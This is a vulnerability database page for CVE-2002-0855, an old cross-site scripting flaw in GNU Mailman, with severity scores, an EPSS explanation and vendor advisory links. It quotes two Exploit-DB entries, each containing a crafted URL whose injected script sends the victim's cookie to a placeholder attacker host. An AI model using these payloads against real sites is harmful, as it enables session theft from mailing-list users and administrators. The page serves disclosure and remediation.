CVE-2002-0855 : Detail

CVE-2002-0855

5.84%V3
Network
2002-08-14
02h00 +00:00
2003-03-24
23h00 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Cross-site scripting vulnerability in Mailman before 2.0.12 allows remote attackers to execute script as other users via a subscriber's list subscription options in the (1) adminpw or (2) info parameters to the ml-name feature.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 21642

Publication date : 2002-07-23 22h00 +00:00
Author : office
EDB Verified : Yes

source: https://www.securityfocus.com/bid/5299/info GNU Mailman is prone to a cross-site scripting vulnerability. An attacker may construct a malicious link to the administrative login page, which contains arbitrary HTML and script code. A user visiting the link will have the attacker's script code executed in their web browser in the context of the site running the vulnerable software. http://target/mailman_directory/admin/ml-name?adminpw="/onClick="window.open('http://attackerhost/attackerscript.cgi?'+document.cookie);
Exploit Database EDB-ID : 21641

Publication date : 2002-07-23 22h00 +00:00
Author : office
EDB Verified : Yes

source: https://www.securityfocus.com/bid/5298/info GNU Mailman is prone to a cross-site scripting vulnerability. Arbitrary HTML and script code are not sanitized from the URI parameters of mailing list subscribe scripts. An attacker may exploit this issue by creating a malicious link containing arbitrary script code and enticing a web user to visit the link. http://target/mailman/subscribe/ml-name?info=<script>document.location%3D"http://attackerhost/attackerscript.cgi?"%2Bdocument.cookie;</script>

Products Mentioned

Configuraton 0

Gnu>>Mailman >> Version 2.0.12

References

http://www.redhat.com/support/errata/RHSA-2002-177.html
Tags : vendor-advisory, x_refsource_REDHAT
http://www.redhat.com/support/errata/RHSA-2002-178.html
Tags : vendor-advisory, x_refsource_REDHAT
http://www.debian.org/security/2002/dsa-147
Tags : vendor-advisory, x_refsource_DEBIAN
http://www.securityfocus.com/bid/5298
Tags : vdb-entry, x_refsource_BID
http://www.redhat.com/support/errata/RHSA-2002-181.html
Tags : vendor-advisory, x_refsource_REDHAT
http://www.redhat.com/support/errata/RHSA-2002-176.html
Tags : vendor-advisory, x_refsource_REDHAT
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000522
Tags : vendor-advisory, x_refsource_CONECTIVA